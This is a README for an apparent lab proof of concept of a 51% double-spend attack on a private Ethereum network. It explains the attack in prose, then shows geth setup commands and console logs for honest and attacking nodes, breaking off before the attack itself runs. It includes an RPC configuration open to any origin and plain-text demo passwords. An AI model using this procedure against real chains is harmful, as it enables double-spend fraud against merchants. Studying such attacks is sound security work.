# Blockchain 51% attack on Ethereum Blockain

[Version Française](README-FR.md)

## Introduction

<div style="text-align: justify">
This repository allows to highlight and explain several concepts around the blockchain. Its goal is to technically present the realization of a 51% attack on a private blockchain. The technology used in our case will be Ethereum.
</div>

## Presentation of the blockchain

<div style="text-align: justify">
To quickly present the blockchain, or chain of blocks in French, it is a technical solution that allows you to store data in the same way as a database. However, it has some specificities, it is decentralized and distributed. That is to say that none of the nodes can control or modify the information sent in it. All the data is shared and replicated on each node. The data sent by the nodes are checked and validated by the blockchain. All this data is used to form a chain of blocks. The data as well as the updates of the nodes is done via P2P.
</div>

<table align="center"><tr><td align="center" width="9999">
  <img width="690" height="309" src="img/blockchain-schema-transaction.jpg">
</td></tr></table>

<div style="text-align: justify">
It is therefore, by default, forgery-proof. It should be seen as a huge register that contains all the transactions. Anyone can consult all the transactions, but no one can modify them.

These systems are now being put forward, particularly with the explosion of virtual currencies. This does not reflect the real use that can be made of a blockchain, as all the aspects presented regularly are purely speculative, as in the case of Bitcoin, for example.

The use of a blockchain makes it possible to meet specific needs. It should not be used as a simple replacement of a classic database, if your database can meet your needs without any problem, then you do not need to use a blockchain.

In all blockchains there are "miners", these miners are there to create blocks. To create a block you have to install a software and this one will take care of using the resources of your computer to solve complicated mathematical calculations, each time the calculation is solved you create blocks. They serve as "fuel" in the blockchain, because for each transaction you will have to pay a small part. For example with the most famous blockchain, miner allows you to create bitcoins. And when you want to pay or get paid, the person who initiated the transaction will pay a fee. You need to have that fuel to trade on the blockchain. Another example with the Ethereum blockchain, for each block mined, 3 ETH are paid out.

To mine, several configurations are possible, it is possible to add your machines to the blockchain and mine normally, but you need a big computing power to get results on the short term. It is also possible to join a "pool", i.e. a set of people putting at disposal their computing power to mine a block. When the block is mined, the ETH/BTC won are then redistributed to the miners according to the computing power they have provided.

All the blockchains are used and built around cryptography. Most of them use algorithms specific to their chain, such as ETHash for Ethereum. Asymmetric algorithms are also used, such as elliptic curves and the secp256k1 curve for Bitcoin. The security and tamper-proofing of the blockchain is ensured by the use of these protocols.
</div>

Illustration of the blockchain :
<table align="center"><tr><td align="center" width="9999">
  <img width="690" height="435" src="img/blockchain-transaction.jpg">
</td></tr></table>

## Ethereum

<div style="text-align: justify">
Ethereum is a blockchain known under the symbol "ETH", it's one of the best known with Bitcoin (BTC). This blockchain will be used for our PoC. For obvious feasibility reasons we will use a private blockchain and not the public blockchain of Ethereum.

Ethereum makes it possible thanks to an intelligent contract system (SmartContract) to make contracts between the different parts of the blockchain. This is a very interesting and revolutionary feature for certain environments such as insurance companies for example. The particularity of Ethereum lies in this contract system, it allows this technology to be widely used for different projects, whether on the public blockchain or private projects.
</div>

## The limits

<div style="text-align: justify">
Like all technologies, the different blockchains have limits, especially the one we will try to exploit today. It intervenes at the level of the computing power, the network of the blockchain is decentralized, it is based on nodes X and Y held by a community.

So one of the limits is that if a person or a group of people manages to hold more than 50% of the computing power, it will be able to control the blockchain, and therefore alter its operation and call into question its entire functioning.

One of the other limits can intervene at the level of the protocols themselves, if a vulnerability is detected, either on the mining protocol or on the implementation of the blockchain, the whole system is compromised. A solution to this kind of problem is to create a blockchain fork by applying the corrections. This case has been observed with the separation of the Ethereum "ETH" and the Ethereum Classic "ETC".
</div>

## Context presentation

<div style="text-align: justify">
As already indicated the purpose of this page is to present a 51% attack on a private Ethereum blockchain.

To contextualize this attack we will take the case of a company selling products on its website. This purchase has to be settled through the use of a private blockchain based on Ethereum.

The person making the purchase is therefore able to add nodes on this blockchain and thus to carry out this attack.
</div>

## The attack

<div style="text-align: justify">
The attack will thus allow to have a bigger computing power than all the nodes of the blockchain, and thus to alter its data and operation.

The attacker will first of all add nodes on the blockchain of the seller site. The addition of these nodes will allow to recover the blockchain and to synchronize with the other machines of the blockchain.

The attacker must have more power than the one currently used on the blockchain. To achieve this, I let you imagine the possible scenarios (hack of the machines of the blockchain, use of EC2 cloud instance, etc.).

Once the computing power is in possession of the attacker, he will disconnect his machines from the company network, but he will continue to undermine blocks with his machines. It is at this moment that he will make a purchase on the site. Once the transaction is completed, he will reconnect his machines to the network.

This will have the effect of overwriting the transaction that has just been completed. This is due to the fact that the attacker has more than 50% computing power on the blockchain. He has therefore been able to mine with more power than the rest of the blockchain. When reconnecting his machines to the network, a validation is performed to know the chain to follow, and since the attacker's is more advanced, it will be automatically selected by the blockchain and replicated on each node.

The transaction between the attacker and the seller site is thus cancelled.
</div>

## Presentation of the platform for PoC

<div style="text-align: justify">
To perform a 51% attack test on the Ethereum blockchain we chose to use Debian 10. The ISO we used is available in /utils/iso. The packages as well as the application binaries are available in /utils/bin.

The platform consists of 3 machines:
- 2 attacking machines
- 1 "honest" machine which represents the blockchain of the selling company

The number of machines is scalable, we use two so that it is not too heavy for the PoC.

The specifications are as follows:
- Attacking machine: 4vCPU, 4Gb RAM, 50Gb HDD
- Company Machine: 4vCPU, 4GB RAM, 50GB HDD
</div>

<table align="center"><tr><td align="center" width="9999">
  <img width="690" height="390" src="img/blockchain-example.png">
</td></tr></table>

## The tools used

<div style="text-align: justify">
For the realization of this attack we will use the basic tools to create and manipulate an Ethereum blockchain.

- Debian OS version 10.3.0 65bits Netinst (ISO available in utlis/iso)
- GO Ethereum (GETH) in version 1.9.12 (package available in utils/bin)

All versions of GETH are available on the official website: https://geth.ethereum.org/downloads/

All versions of Debian are available at the official web site: http://ftp.nl.debian.org/debian/dists/.

Geth allows to install the engine of the ethereum blockchain as well as the Javascript client of the same name.
</div>

## Table of Contents

| Geth parameter          | Meanining                                                                                                            |
| ----------------------- | -------------------------------------------------------------------------------------------------------------------- |
| attach                  | Start an interactive JavaScript environment (connect to node)                                                        |
| console                 | Start an interactive JavaScript environment                                                                          |
| init                    | Bootstrap and initialize a new genesis block                                                                         |
| --allow-insecure-unlock | Allow insecure account unlocking when account-related RPCs are exposed by http                                       |
| --bootnodes value       | Comma separated enode URLs for P2P discovery bootstrap (set v4+v5 instead for light servers)                         |
| --cache value           | Megabytes of memory allocated to internal caching (default = 4096 mainnet full node, 128 light mode) (default: 1024) |
| --datadir value         | Data directory for the databases and keystore (default: "/root/.ethereum")                                           |
| --identity              | Custom node name                                                                                                     |
| --ipcpath value         | Filename for IPC socket/pipe within the datadir (explicit paths escape it)                                           |
| --lightkdf              | Reduce key-derivation RAM & CPU usage at some expense of KDF strength                                                |
| --maxpeers value        | Maximum number of network peers (network disabled if set to 0) (default: 50)                                         |
| --mine                  | Enable mining                                                                                                        |
| --miner.threads value   | Number of CPU threads to use for mining (default: 0)                                                                 |
| --networkid value       | Network identifier (integer, 1=Frontier, 2=Morden (disused), 3=Ropsten, 4=Rinkeby) (default: 1)                      |
| --nodiscover            | Disables the peer discovery mechanism (manual peer addition)                                                         |
| --nousb                 | Disables monitoring for and managing USB hardware wallets                                                            |
| --port value            | Network listening port (default: 30303)                                                                              |
| --rpc                   | Enable the HTTP-RPC server                                                                                           |
| --rpccorsdomain value   | Comma separated list of domains from which to accept cross origin requests (browser enforced)                        |
| --rpcport value         | HTTP-RPC server listening port (default: 8545)                                                                       |

## Hosts & Architecture folders

```
root# uname -a
Linux node-2 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
root# cat /etc/debian_version
10.3
```

- node-1 : 4vCPUs et 4GB de RAM - IP : 192.168.0.17 (honestMiner)
- node-2 : 4vCPUs et 4GB de RAM - IP : 192.168.0.34 (maliciousMiner)
- node-3 : 4vCPUs et 4GB de RAM - IP : 192.168.0.35 (maliciousPerson)

```
honestMiner
	data
maliciousMiner
	data
maliciousPerson
	data
network
	genesis.json
```

## Prerequisites

{- On each host -}

### With Internet connection

```
root# apt install gnupg1 -y
root# echo "deb http://ppa.launchpad.net/ethereum/ethereum/ubuntu bionic main " | tee /etc/apt/sources.list.d/ethereum.list
root# apt-key adv --keyserver keyserver.ubuntu.com  --recv-keys 2A518C819BE37D2C2031944D1C52189C923F6CA9
root# apt update
root# apt install ethereum git -y
root# geth version
Geth
Version: 1.9.11-stable
Git Commit: 6a62fe399b68ab9e3625ef5e7900394f389adc3a
Architecture: amd64
Protocol Versions: [65 64 63]
Go Version: go1.13.8
Operating System: linux
GOPATH=
GOROOT=/build/ethereum-2t6lYR/.go
root# git clone https://gitlab.com/adrienpavone/blockchain_51.git
root# cd blockchain_51
```

### Without Internet connection

```
root# cd blockchain_51/utils/bin
root# dpkg -i *
root# cd ../../
```

## Purpose

The subject of the project is to send *1000000000000000000* private ethereum to the marketplace with address *0xe82e809d5f9574b54a4b8ead7e195b163b39662f*, and then break the sequence of the chain with the attack of 51%.

### Init project node

#### Init Ethereum network

{- On honestMiner host -}

`geth --nousb --datadir honestMiner/data  init network/genesis.json`
```shell                                       
INFO [03-08|13:14:28.162] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:14:28.162] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:14:28.163] Allocated cache and file handles         database=/root/blockchain_51/honestMiner/data/geth/chaindata cache=16.00MiB handles=16
INFO [03-08|13:14:28.418] Writing custom genesis block
INFO [03-08|13:14:28.419] Persisted trie from memory database      nodes=1 size=149.00B time=95.9µs gcnodes=0 gcsize=0.00B gctime=0s livenodes=1 livesize=0.00B
INFO [03-08|13:14:28.419] Successfully wrote genesis state         database=chaindata hash=2d326d…48d0a3
INFO [03-08|13:14:28.419] Allocated cache and file handles         database=/root/blockchain_51/honestMiner/data/geth/lightchaindata cache=16.00MiB handles=16
INFO [03-08|13:14:28.635] Writing custom genesis block
INFO [03-08|13:14:28.636] Persisted trie from memory database      nodes=1 size=149.00B time=90.983µs gcnodes=0 gcsize=0.00B gctime=0s livenodes=1 livesize=0.00B
INFO [03-08|13:14:28.636] Successfully wrote genesis state         database=lightchaindata hash=2d326d…48d0a3
```

#### Create honest miner

When you access to the console with the following command, you have to exec ```personal.newAccount()``` in order to create the honestMiner account, then ```admin.nodeInfo.enode``` in order to get the enode information, finally, the command ```personal``` to get all the personnal informations of the node.

{- On honestMiner host -}

`geth --nousb --networkid 15 --port 60303 --rpc --lightkdf --cache 16 --datadir honestMiner/data console`
```shell
INFO [03-08|13:14:40.616] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:14:40.617] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:14:40.617] Starting peer-to-peer node               instance=Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:14:40.617] Allocated trie memory caches             clean=4.00MiB dirty=4.00MiB
INFO [03-08|13:14:40.617] Allocated cache and file handles         database=/root/blockchain_51/honestMiner/data/geth/chaindata cache=16.00MiB handles=524288
INFO [03-08|13:14:41.066] Opened ancient database                  database=/root/blockchain_51/honestMiner/data/geth/chaindata/ancient
INFO [03-08|13:14:41.067] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
INFO [03-08|13:14:41.067] Disk storage enabled for ethash caches   dir=/root/blockchain_51/honestMiner/data/geth/ethash count=3
INFO [03-08|13:14:41.067] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:14:41.067] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=<nil>
WARN [03-08|13:14:41.067] Upgrade blockchain database version      from=<nil> to=7
INFO [03-08|13:14:41.068] Loaded most recent local header          number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:14:41.068] Loaded most recent local full block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:14:41.068] Loaded most recent local fast block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:14:41.068] Regenerated local transaction journal    transactions=0 accounts=0
INFO [03-08|13:14:41.069] Allocated fast sync bloom                size=8.00MiB
INFO [03-08|13:14:41.073] Initialized fast sync bloom              items=1 errorrate=0.000 elapsed=1.869ms
INFO [03-08|13:14:41.144] New local node record                    seq=1 id=8ae30acc5217cc82 ip=127.0.0.1 udp=60303 tcp=60303
INFO [03-08|13:14:41.146] IPC endpoint opened                      url=/root/blockchain_51/honestMiner/data/geth.ipc
INFO [03-08|13:14:41.147] HTTP endpoint opened                     url=http://127.0.0.1:8545 cors= vhosts=localhost
INFO [03-08|13:14:41.152] Started P2P networking                   self=enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@127.0.0.1:60303
WARN [03-08|13:14:41.222] Served eth_coinbase                      reqid=3 t=26.137µs err="etherbase must be explicitly specified"
Welcome to the Geth JavaScript console!

instance: Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
at block: 0 (Thu Jan 01 1970 01:00:00 GMT+0100 (CET))
 datadir: /root/blockchain_51/honestMiner/data
 modules: admin:1.0 debug:1.0 eth:1.0 ethash:1.0 miner:1.0 net:1.0 personal:1.0 rpc:1.0 txpool:1.0 web3:1.0

> INFO [03-08|13:14:42.495] New local node record                    seq=2 id=8ae30acc5217cc82 ip=109.15.242.225 udp=29208 tcp=60303
> personal.newAccount()
Passphrase:
Repeat passphrase:
INFO [03-08|13:14:51.729] Looking for peers                        peercount=0 tried=77 static=0
INFO [03-08|13:14:51.927] Your new key was generated               address=0x3c5f76F70fE977FA25722CC6D1ec84909639224D
WARN [03-08|13:14:51.927] Please backup your key file!             path=/root/blockchain_51/honestMiner/data/keystore/UTC--2020-03-08T12-14-51.681696153Z--3c5f76f70fe977fa25722cc6d1ec84909639224d
WARN [03-08|13:14:51.927] Please remember your password!
"0x3c5f76f70fe977fa25722cc6d1ec84909639224d"
> personal
{
  listAccounts: ["0x3c5f76f70fe977fa25722cc6d1ec84909639224d"],
  listWallets: [{
      accounts: [{...}],
      status: "Locked",
      url: "keystore:///root/blockchain_51/honestMiner/data/keystore/UTC--2020-03-08T12-14-51.681696153Z--3c5f76f70fe977fa25722cc6d1ec84909639224d"
  }],
  deriveAccount: function(),
  ecRecover: function(),
  getListAccounts: function(callback),
  getListWallets: function(callback),
  importRawKey: function(),
  initializeWallet: function(),
  lockAccount: function(),
  newAccount: function(),
  openWallet: function(),
  sendTransaction: function(),
  sign: function(),
  signTransaction: function(),
  unlockAccount: function(),
  unpair: function()
}
> admin.nodeInfo.enode
"enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@109.15.242.225:60303?discport=29208"
> exit
INFO [03-08|13:15:01.234] HTTP endpoint closed                     url=http://127.0.0.1:8545
INFO [03-08|13:15:01.234] IPC endpoint closed                      url=/root/blockchain_51/honestMiner/data/geth.ipc
INFO [03-08|13:15:01.234] Blockchain manager stopped
INFO [03-08|13:15:01.234] Stopping Ethereum protocol
INFO [03-08|13:15:01.234] Ethereum protocol stopped
INFO [03-08|13:15:01.234] Transaction pool stopped
INFO [03-08|13:15:01.735] Looking for peers                        peercount=1 tried=81 static=0  
```

#### Begin mining with low CPU

{- On honestMiner host -}

`geth --nousb --identity nodeAPAVONE --nodiscover --networkid 15 --port 60303 --maxpeers 10 --lightkdf --cache 16  --rpc --rpccorsdomain "*" --datadir honestMiner/data --miner.threads 1 --mine
`
```shell
INFO [03-08|13:15:15.209] Maximum peer count                       ETH=10 LES=0 total=10
INFO [03-08|13:15:15.209] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:15:15.209] Starting peer-to-peer node               instance=Geth/nodeAPAVONE/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:15:15.209] Allocated trie memory caches             clean=4.00MiB dirty=4.00MiB
INFO [03-08|13:15:15.210] Allocated cache and file handles         database=/root/blockchain_51/honestMiner/data/geth/chaindata cache=16.00MiB handles=524288
INFO [03-08|13:15:15.576] Opened ancient database                  database=/root/blockchain_51/honestMiner/data/geth/chaindata/ancient
INFO [03-08|13:15:15.576] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
INFO [03-08|13:15:15.576] Disk storage enabled for ethash caches   dir=/root/blockchain_51/honestMiner/data/geth/ethash count=3
INFO [03-08|13:15:15.576] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:15:15.577] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=7
INFO [03-08|13:15:15.578] Loaded most recent local header          number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:15:15.578] Loaded most recent local full block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:15:15.578] Loaded most recent local fast block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:15:15.578] Loaded local transaction journal         transactions=0 dropped=0
INFO [03-08|13:15:15.579] Regenerated local transaction journal    transactions=0 accounts=0
INFO [03-08|13:15:15.579] Allocated fast sync bloom                size=8.00MiB
INFO [03-08|13:15:15.581] Initialized fast sync bloom              items=1 errorrate=0.000 elapsed=980.756µs
INFO [03-08|13:15:15.729] New local node record                    seq=3 id=8ae30acc5217cc82 ip=127.0.0.1 udp=0 tcp=60303
INFO [03-08|13:15:15.729] Started P2P networking                   self="enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@127.0.0.1:60303?discport=0"
INFO [03-08|13:15:15.730] IPC endpoint opened                      url=/root/blockchain_51/honestMiner/data/geth.ipc
INFO [03-08|13:15:15.731] HTTP endpoint opened                     url=http://127.0.0.1:8545 cors=* vhosts=localhost
INFO [03-08|13:15:15.731] Transaction pool price threshold updated price=1000000000
INFO [03-08|13:15:15.731] Updated mining threads                   threads=1
INFO [03-08|13:15:15.731] Transaction pool price threshold updated price=1000000000
INFO [03-08|13:15:15.731] Etherbase automatically configured       address=0x3c5f76F70fE977FA25722CC6D1ec84909639224D
INFO [03-08|13:15:15.731] Commit new mining work                   number=1 sealhash=869fa6…678564 uncles=0 txs=0 gas=0 fees=0 elapsed=196.883µs
INFO [03-08|13:15:16.269] Successfully sealed new block            number=1 sealhash=869fa6…678564 hash=9fd433…919790 elapsed=537.640ms
INFO [03-08|13:15:16.269] 🔨 mined potential block                  number=1 hash=9fd433…919790
INFO [03-08|13:15:16.269] Commit new mining work                   number=2 sealhash=436627…d25d22 uncles=0 txs=0 gas=0 fees=0 elapsed=168.842µs
INFO [03-08|13:15:17.332] Successfully sealed new block            number=2 sealhash=436627…d25d22 hash=db2ac9…704a42 elapsed=1.062s
INFO [03-08|13:15:17.332] 🔨 mined potential block                  number=2 hash=db2ac9…704a42
INFO [03-08|13:15:17.332] Commit new mining work                   number=3 sealhash=5f0bed…ebc5b4 uncles=0 txs=0 gas=0 fees=0 elapsed=394.287µs
INFO [03-08|13:15:19.195] Successfully sealed new block            number=3 sealhash=5f0bed…ebc5b4 hash=f641b8…8c5c58 elapsed=1.862s
INFO [03-08|13:15:19.195] 🔨 mined potential block                  number=3 hash=f641b8…8c5c58
INFO [03-08|13:15:19.195] Commit new mining work                   number=4 sealhash=54d41b…a5541b uncles=0 txs=0 gas=0 fees=0 elapsed=374.654µs
INFO [03-08|13:15:22.031] Successfully sealed new block            number=4 sealhash=54d41b…a5541b hash=c157a3…d71b22 elapsed=2.836s
INFO [03-08|13:15:22.031] 🔨 mined potential block                  number=4 hash=c157a3…d71b22
INFO [03-08|13:15:22.032] Commit new mining work                   number=5 sealhash=7ba808…5ff6a5 uncles=0 txs=0 gas=0 fees=0 elapsed=525.802µs
```

For this challenge, you will need to give to the attacker the enode address in order to sync with the honestMiner : *"enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@192.168.0.17:60303"*

And the *genesis.json* file under network folder in order to get the coinbase address and all the associated informations.

### The attack !

In order to attack, the attacker need 2 account, a maliciousMiner account and the maliciousPerson account. He will have to create for both the network, and an account.

#### Init network

{- On maliciousMiner host -}

`geth --nousb --datadir maliciousMiner/data  init network/genesis.json`
```shell
INFO [03-08|13:21:34.244] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:21:34.244] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:21:34.244] Allocated cache and file handles         database=/root/blockchain_51/maliciousMiner/data/geth/chaindata cache=16.00MiB handles=16
INFO [03-08|13:21:34.319] Writing custom genesis block
INFO [03-08|13:21:34.320] Persisted trie from memory database      nodes=1 size=149.00B time=107.646µs gcnodes=0 gcsize=0.00B gctime=0s livenodes=1 livesize=0.00B
INFO [03-08|13:21:34.320] Successfully wrote genesis state         database=chaindata hash=2d326d…48d0a3
INFO [03-08|13:21:34.320] Allocated cache and file handles         database=/root/blockchain_51/maliciousMiner/data/geth/lightchaindata cache=16.00MiB handles=16
INFO [03-08|13:21:34.419] Writing custom genesis block
INFO [03-08|13:21:34.420] Persisted trie from memory database      nodes=1 size=149.00B time=335.782µs gcnodes=0 gcsize=0.00B gctime=0s livenodes=1 livesize=0.00B
INFO [03-08|13:21:34.420] Successfully wrote genesis state         database=lightchaindata hash=2d326d…48d0a3
```
{- On maliciousPerson host -}

`geth --nousb --datadir maliciousPerson/data  init network/genesis.json`
```shell
INFO [03-08|13:21:39.721] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:21:39.721] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:21:39.721] Allocated cache and file handles         database=/root/blockchain_51/maliciousPerson/data/geth/chaindata cache=16.00MiB handles=16
INFO [03-08|13:21:40.010] Writing custom genesis block
INFO [03-08|13:21:40.011] Persisted trie from memory database      nodes=1 size=149.00B time=88.67µs gcnodes=0 gcsize=0.00B gctime=0s livenodes=1 livesize=0.00B
INFO [03-08|13:21:40.011] Successfully wrote genesis state         database=chaindata hash=2d326d…48d0a3
INFO [03-08|13:21:40.011] Allocated cache and file handles         database=/root/blockchain_51/maliciousPerson/data/geth/lightchaindata cache=16.00MiB handles=16
INFO [03-08|13:21:40.109] Writing custom genesis block
INFO [03-08|13:21:40.110] Persisted trie from memory database      nodes=1 size=149.00B time=1.502934ms gcnodes=0 gcsize=0.00B gctime=0s livenodes=1 livesize=0.00B
INFO [03-08|13:21:40.111] Successfully wrote genesis state         database=lightchaindata hash=2d326d…48d0a3
```

#### Create accounts

##### maliciousMiner

- account : *maliciousMiner*
- password : *maliciousminer*

When you access to the console with the following command, you have to exec ```personal.newAccount()``` in order to create the maliciousMiner account, then ```admin.nodeInfo.enode``` in order to get the enode information, finally, the command ```personal``` to get all the personnal informations of the node.

{- On maliciousMiner host -}

`geth --nousb --networkid 15 --port 60303 --rpc --rpcport 8545 --lightkdf --cache 16 --datadir maliciousMiner/data console`
```shell
INFO [03-08|13:24:42.499] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:24:42.499] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:24:42.499] Starting peer-to-peer node               instance=Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:24:42.499] Allocated trie memory caches             clean=4.00MiB dirty=4.00MiB
INFO [03-08|13:24:42.500] Allocated cache and file handles         database=/root/blockchain_51/maliciousMiner/data/geth/chaindata cache=16.00MiB handles=524288
INFO [03-08|13:24:42.837] Opened ancient database                  database=/root/blockchain_51/maliciousMiner/data/geth/chaindata/ancient
INFO [03-08|13:24:42.837] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
INFO [03-08|13:24:42.837] Disk storage enabled for ethash caches   dir=/root/blockchain_51/maliciousMiner/data/geth/ethash count=3
INFO [03-08|13:24:42.837] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:24:42.837] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=<nil>
WARN [03-08|13:24:42.837] Upgrade blockchain database version      from=<nil> to=7
INFO [03-08|13:24:42.838] Loaded most recent local header          number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:24:42.839] Loaded most recent local full block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:24:42.839] Loaded most recent local fast block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:24:42.839] Regenerated local transaction journal    transactions=0 accounts=0
INFO [03-08|13:24:42.840] Allocated fast sync bloom                size=8.00MiB
INFO [03-08|13:24:42.843] Initialized fast sync bloom              items=1 errorrate=0.000 elapsed=2.229ms
INFO [03-08|13:24:42.964] New local node record                    seq=1 id=358c5618374a8627 ip=127.0.0.1 udp=60303 tcp=60303
INFO [03-08|13:24:42.964] Started P2P networking                   self=enode://92d5d085f7c834762dd190095508d470f8dc001975e6d7a8689fb6b69ba1f749bdff8e2be1a1d948b78c850e7bfe017cbb31d998161e6112f608b7435d7d6ef0@127.0.0.1:60303
INFO [03-08|13:24:42.966] IPC endpoint opened                      url=/root/blockchain_51/maliciousMiner/data/geth.ipc
INFO [03-08|13:24:42.966] HTTP endpoint opened                     url=http://127.0.0.1:8545 cors= vhosts=localhost
WARN [03-08|13:24:43.042] Served eth_coinbase                      reqid=3 t=72.588µs err="etherbase must be explicitly specified"
Welcome to the Geth JavaScript console!

instance: Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
at block: 0 (Thu Jan 01 1970 01:00:00 GMT+0100 (CET))
 datadir: /root/blockchain_51/maliciousMiner/data
 modules: admin:1.0 debug:1.0 eth:1.0 ethash:1.0 miner:1.0 net:1.0 personal:1.0 rpc:1.0 txpool:1.0 web3:1.0

> perINFO [03-08|13:24:44.940] New local node record                    seq=2 id=358c5618374a8627 ip=109.15.242.225 udp=60303 tcp=60303
> personal.newAccount()
Passphrase:
Repeat passphrase:

INFO [03-08|13:24:54.138] Your new key was generated               address=0xEAB6fFe92041e39233C95451A72Cf5E82cD23297
WARN [03-08|13:24:54.138] Please backup your key file!             path=/root/blockchain_51/maliciousMiner/data/keystore/UTC--2020-03-08T12-24-53.901555019Z--eab6ffe92041e39233c95451a72cf5e82cd23297
WARN [03-08|13:24:54.138] Please remember your password!
"0xeab6ffe92041e39233c95451a72cf5e82cd23297"
> personal
{
  listAccounts: ["0xeab6ffe92041e39233c95451a72cf5e82cd23297"],
  listWallets: [{
      accounts: [{...}],
      status: "Locked",
      url: "keystore:///root/blockchain_51/maliciousMiner/data/keystore/UTC--2020-03-08T12-24-53.901555019Z--eab6ffe92041e39233c95451a72cf5e82cd23297"
  }],
  deriveAccount: function(),
  ecRecover: function(),
  getListAccounts: function(callback),
  getListWallets: function(callback),
  importRawKey: function(),
  initializeWallet: function(),
  lockAccount: function(),
  newAccount: function(),
  openWallet: function(),
  sendTransaction: function(),
  sign: function(),
  signTransaction: function(),
  unlockAccount: function(),
  unpair: function()
}
> admin.nodeInfo.enode
"enode://92d5d085f7c834762dd190095508d470f8dc001975e6d7a8689fb6b69ba1f749bdff8e2be1a1d948b78c850e7bfe017cbb31d998161e6112f608b7435d7d6ef0@109.15.242.225:60303"
> exit
INFO [03-08|13:25:01.919] HTTP endpoint closed                     url=http://127.0.0.1:8545
INFO [03-08|13:25:01.920] IPC endpoint closed                      url=/root/blockchain_51/maliciousMiner/data/geth.ipc
INFO [03-08|13:25:01.920] Blockchain manager stopped
INFO [03-08|13:25:01.920] Stopping Ethereum protocol
INFO [03-08|13:25:01.920] Ethereum protocol stopped
INFO [03-08|13:25:01.920] Transaction pool stopped
```

##### maliciousPerson

- account : *maliciousPerson*
- password : *maliciousperson*

When you access to the console with the following command, you have to exec ```personal.newAccount()``` in order to create the maliciousPerson account, then ```admin.nodeInfo.enode``` in order to get the enode information, finally, the command ```personal``` to get all the personnal informations of the node.

{- On maliciousPerson host -}

`geth --nousb --networkid 15 --port 60306 --rpc --rpcport 8547 --lightkdf --cache 16 --datadir maliciousPerson/data console`
```shell
INFO [03-08|13:26:42.177] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:26:42.177] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:26:42.178] Starting peer-to-peer node               instance=Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:26:42.179] Allocated trie memory caches             clean=4.00MiB dirty=4.00MiB
INFO [03-08|13:26:42.179] Allocated cache and file handles         database=/root/blockchain_51/maliciousPerson/data/geth/chaindata cache=16.00MiB handles=524288
INFO [03-08|13:26:42.475] Opened ancient database                  database=/root/blockchain_51/maliciousPerson/data/geth/chaindata/ancient
INFO [03-08|13:26:42.476] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
